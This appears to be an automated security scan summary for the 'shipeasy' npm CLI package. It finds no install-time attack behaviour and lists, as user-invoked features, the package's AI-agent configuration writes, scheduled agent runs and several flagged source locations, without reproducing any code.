AI Security Review
scanned 4h ago · by lpm-firewall-aiNo install-time attack behavior was found. The real risk is a user-invoked agent onboarding and automation surface that can register Shipeasy MCP/instructions and prepare scheduled coding-agent runs.
Decision evidence
public snapshot- dist/index.js registers Shipeasy MCP into Claude/Cursor/Copilot/Codex configs via explicit `shipeasy mcp install`/`setup`.
- dist/index.js can write agent instruction files: AGENTS.md, .cursor/rules/shipeasy.mdc, .github/copilot-instructions.md.
- dist/index.js `ops trigger prep` builds an unattended Claude routine prompt with allowed tools and an embedded restricted ops key.
- dist/index.js can spawn user-selected agents (`claude`, `codex`, `cursor-agent`, `copilot`) during interactive setup.
- package.json has no npm lifecycle hooks; bin only loads dist/index.js on CLI invocation.
- AI-agent config writes are tied to explicit CLI commands with prompts/dry-run options, not install-time execution.
- Network calls target Shipeasy/GitHub/npm endpoints aligned with login, API, MCP, skill fetch, and update-check behavior.
- Credential reads are limited to SHIPEASY_CLI_TOKEN/PROJECT_ID or Shipeasy config for authenticated API use.
- No evidence of broad file harvesting, secret exfiltration, destructive actions, persistence hooks, or remote code execution on import.
Source & flagged code
4 flagged · loading sourceA single source file combines environment access, network access, and code or shell execution; review context before blocking.
dist/index.jsView on unpkg · L45Source collects local host identity data and sends it to an external endpoint.
dist/index.jsView on unpkg · L45Package source references dynamic require/import behavior.
bin/shipeasy.jsView on unpkg · L1